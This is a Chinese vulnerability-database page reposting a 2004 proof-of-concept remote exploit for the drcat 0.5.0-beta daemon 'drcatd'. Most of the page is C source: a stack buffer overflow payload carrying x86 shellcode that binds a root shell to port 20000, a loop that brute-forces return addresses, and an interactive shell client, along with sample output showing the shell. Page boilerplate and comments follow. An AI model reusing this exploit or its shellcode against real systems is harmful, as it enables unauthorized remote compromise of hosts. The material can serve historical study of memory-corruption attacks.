Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution
漏洞ID | 1054540 | 漏洞类型 | |
发布时间 | 2004-07-22 | 更新时间 | 2004-07-22 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Proof of Concept DRCATD Remote exploit
by Taif
__
Test:
[root@localhost drcat]# ./drcat -d 127.0.0.1 -u taif -p test
Public code by Taif
drcat-0.5.0-beta ('remote r00t' proof)
Bug found by Khan Shirani
host: +-+-+-+-+-+-+-+
127.0.0.1 |C|L|U|P|C|S|R|
user: |O|O|S|A|O|E|O|
taif |O|G|E|S|D|N|O|
password: |N|O|R|S|E|D|T|
test | | | | | | | |
---------retaddr---+-+-+-+-+-+-+-+
bfefc000 * * * * * * X
bfefbfd1 * * * * * * X
bfefbfa2 * * * * * * X
bfefbf73 * * * * * * X
bfefbf44 * * * * * * X
bfefbf15 * * * * * * X
bfefbee6 * * * * * * X
bfefbeb7 * * * * * * X
bfefbe88 * * * * * * X
bfefbe59 * * * * * * X
bfefbe2a * * * * * * X
bfefbdfb * * * * * * X
bfefbdcc * * * * * * X
bfefbd9d * * * * * * X
bfefbd6e * * * * * * X
bfefbd3f * * * * * * X
bfefbd10 * * * * * * X
bfefbce1 * * * * * * X
bfefbcb2 * * * * * * X
bfefbc83 * * * * * * X
bfefbc54 * * * * * * X
bfefbc25 * * * * * * X
bfefbbf6 * * * * * * X
bfefbbc7 * * * * * * X
bfefbb98 * * * * * * X
bfefbb69 * * * * * * X
bfefbb3a * * * * * * X
bfefbb0b * * * * * * X
bfefbadc * * * * * * X
bfefbaad * * * * * * X
bfefba7e * * * * * * X
bfefba4f * * * * * * X
bfefba20 * * * * * * X
bfefb9f1 * * * * * * X
bfefb9c2 * * * * * * X
bfefb993 * * * * * * X
bfefb964 * * * * * * X
bfefb935 * * * * * * X
bfefb906 * * * * * * X
bfefb8d7 * * * * * * X
bfefb8a8 * * * * * * X
bfefb879 * * * * * * X
bfefb84a * * * * * * X
bfefb81b * * * * * * X
bfefb7ec * * * * * * X
bfefb7bd * * * * * * X
bfefb78e * * * * * * X
bfefb75f * * * * * * X
bfefb730 * * * * * * X
bfefb701 * * * * * * X
bfefb6d2 * * * * * * X
bfefb6a3 * * * * * * X
bfefb674 * * * * * * X
bfefb645 * * * * * * X
bfefb616 * * * * * * X
bfefb5e7 * * * * * * X
bfefb5b8 * * * * * * X
bfefb589 * * * * * * X
bfefb55a * * * * * * X
bfefb52b * * * * * * X
bfefb4fc * * * * * * *
* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *
Linux localhost.localdomain 2.4.26 #9 P ?ec 2 09:20:29 CEST 2004 i686 athlon i386 GNU/Linux
uid=500(taif) gid=500(taif) groups=500(taif)
10:04pm up 1:00, 1 user, load average: 0.42, 0.35, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
....
NOTE:
Use this on your own risk!!
This exploit is unnecessary!!
*/
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#define MAXDATASIZE (1024 * 4)
/* Color Pallete ... i love colors;) */
#define YELLOW "E[33m"
#define GREEN "E[32m"
#define RED "E[31m"
#define RESTORE "E[0m"
#define PRINTGREEN(string)
printf("%s%s%s",GREEN,string,RESTORE);
fflush(stdout);
#define PRINTRED(string)
printf("%s%s%s",RED,string,RESTORE);
fflush(stdout);
#define PRINTYELLOW(string)
printf("%s%s%s",YELLOW,string,RESTORE);
fflush(stdout);
/* portbind 20000 (by bighawk) *
* +setuid() */
char code[] =
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"xb0x17" /* movb $0x17,%al */
"xcdx80" /* int $0x80 */
"x31xdb" /* xor ebx, ebx */
"xf7xe3" /* mul ebx */
"xb0x66" /* mov al, 102 */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"x4b" /* dec ebx */
"xcdx80" /* int 80h */
"x89xc7" /* mov edi, eax */
"x52" /* push edx */
"x66x68x4ex20"/* push word 8270 */
"x43" /* inc ebx */
"x66x53" /* push bx */
"x89xe1" /* mov ecx, esp */
"xb0xef" /* mov al, 239 */
"xf6xd0" /* not al */
"x50" /* push eax */
"x51" /* push ecx */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"xb0x66" /* mov al, 102 */
"x43" /* inc ebx */
"x43" /* inc ebx */
"xcdx80" /* int 80h */
"x50" /* push eax */
"x50" /* push eax */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"x43" /* inc ebx */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"x89xd9" /* mov ecx, ebx */
"x89xc3" /* mov ebx, eax */
"xb0x3f" /* mov al, 63 */
"x49" /* dec ecx */
"xcdx80" /* int 80h */
"x41" /* inc ecx */
"xe2xf8" /* loop lp */
"x51" /* push ecx */
"x68x6ex2fx73x68"/* push dword 68732f6eh */
"x68x2fx2fx62x69"/* push dword 69622f2fh */
"x89xe3" /* mov ebx, esp */
"x51" /* push ecx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"xb0xf4" /* mov al, 244 */
"xf6xd0" /* not al */
"xcdx80"; /* int 80h */
void banner()
{
fprintf(stderr,"Public code by Taif n"
"drcat-0.5.0-beta ('remote r00t' proof)n"
"Bug found by Khan Shirani nn");
}
void usage (char *progname)
{
int i;
fprintf (stderr, "usage: %s arguments nn"
"-d hostanme (127.0.0.1) n"
"-u user (NULL) n"
"-p password (NULL) n"
"-P port (3535) n"
"-t timeout (1000=1s) (300) n"
"n", progname);
exit (0);
}
int conn(char *ip,int port)
{
int sock;
struct hostent *host;
struct sockaddr_in addr;
if((host=gethostbyname(ip))==NULL)
{ PRINTRED("Xngethostbyname()n"); exit(1); }
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
addr.sin_addr=*((struct in_addr *)host->h_addr);
memset(&(addr.sin_zero),0,8);
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{ PRINTRED("Xnsocket()n"); exit(1); }
if(connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))==-1)
{ PRINTRED("Xn"); return(-1);}
return(sock);
}
void login(int sock,char* user,char *pass)
{
char buffer[1024];
int n;
memset(buffer,0,sizeof(buffer));
n=recv(sock, buffer, 6, 0);
if(n<0) { PRINTRED("nrecv()n"); exit(1); }
if(n==6)
{
if(strcmp(buffer, "drcatd")) {PRINTYELLOW("* ");}
else {PRINTGREEN("* ");};
}
else {PRINTYELLOW("* ");}
if(send(sock, user, strlen(user), 0) == -1)
{PRINTRED("nsend()n");close(sock);exit(1);}
n=recv(sock, buffer, 1, 0);
if(buffer[0] == '0')
{
PRINTRED("XnINVALID USERn");
close(sock);
exit(1);
}
else {PRINTGREEN("* ")};
if(send(sock, pass, strlen(pass), 0) == -1)
{PRINTRED("send()n");close(sock);exit(1);}
n=recv(sock, buffer, 1, 0);
if(buffer[0] == '0')
{
PRINTRED("XnINVALID PASSWORDn");
close(sock);
exit(1);
}
return;
}
/* change with care */
#define TOP 290
void makec0de(char* haox,unsigned int ret)
{
int i;
memset(haox,0,512);
memset(haox,0x90,TOP);
for (i=0;i<sizeof(code)-1;i++)
haox[TOP-sizeof(code)+i]=code[i];
/* yeah fucking thing (ret%4) */
for (i=TOP-(ret%4);i<504;i=i+4)
*(long *)&haox[i]=ret;
}
void send_it(int sock,char* buffer)
{
int len;
len=strlen(buffer);
if (send(sock, buffer, len, 0) == -1)
{
PRINTRED("Xnsend()n");
close(sock);
exit(1);
}
return;
}
int sh(int sock)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
int received = 0;
//strcpy(snd,"TERM=xterm; export TERM=xterm; exec bash -in");
//write(sock, snd, strlen(snd));
strcpy(snd, "uname -a; id; wn");
write(sock, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);
maxfd = ( ( fileno(stdin) > sock )?fileno(stdin):sock ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sock, snd, strlen(snd));
}
if (FD_ISSET(sock, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(sock, rcv, sizeof(rcv))) == -1)
{
printf("FUCK: Error in readn");
exit(1);
}
if (!n)
{
if (!received)
{
printf("FUCK: failed.nn");
return 0;
}
printf("Connection closed.n");
exit(1);
}
received = 1;
fputs(rcv, stdout);
fflush(stdout);
}
}
}
int main(int argc, char *argv[]){
char buff[MAXDATASIZE];
char *host, *user,*pass,c;
int sockfd,sockfd2;
int port = 3535;
int time = 300;
int ret=0xc0000000-(MAXDATASIZE*260);
host="127.0.0.1";
user=NULL;
pass=NULL;
banner();
if (argc<2) usage (argv[0]);
while((c=getopt(argc,argv,"?hd:u:p:P:t:"))!=-1)
{
switch(c)
{
case 't':
time=atoi(optarg);
break;
case 'P':
port=atoi(optarg);
break;
case 'u':
user=optarg;
break;
case 'd':
host=optarg;
break;
case 'p':
pass=optarg;
break;
case '?':
case 'h':
default:
usage (argv[0]);
break;
}
}
if (host==NULL)
{PRINTRED("Set host!n");usage (argv[0]);}
if (user==NULL)
{PRINTRED("Set user!n");usage (argv[0]);}
if (pass==NULL)
{PRINTRED("Set password!n");usage (argv[0]);}
printf(" host: +-+-+-+-+-+-+-+n"
"%16s |C|L|U|P|C|S|R|n"
" user: |O|O|S|A|O|E|O|n"
"%16s |O|G|E|S|D|N|O|n"
" password: |N|O|R|S|E|D|T|n"
"%16s | | | | | | | |n"
"---------retaddr---+-+-+-+-+-+-+-+n"
,host,user,pass);fflush(stdout);
while(1)
{
printf("%16x ",ret);fflush(stdout);
sockfd=conn(host,port);
if (sockfd<0) {PRINTRED("connect()n");exit(1);}
else PRINTGREEN("* ");
login(sockfd,user,pass);PRINTGREEN("* ");
makec0de(buff,ret);PRINTGREEN("* ");
send_it(sockfd,buff);PRINTGREEN("* ");
close(sockfd);
usleep(time*1000);
sockfd=conn(host,20000);
if (!(sockfd<0))
{
PRINTGREEN("*n");
PRINTGREEN("* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *n");
sh(sockfd);
close(sockfd);
exit(0);
}
ret=ret-((TOP-sizeof(code))/4);
}
exit(0);
}
// milw0rm.com [2004-07-22]
Gsview DSC缓冲区溢出漏洞 漏洞ID 1203681 漏洞类型 缓冲区溢出 发布时间 2002-10-28 更新时间 2002-10-28 CVE编号 CVE-2002-1223 CNNVD-ID CNNVD-200210-287 漏洞平台 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666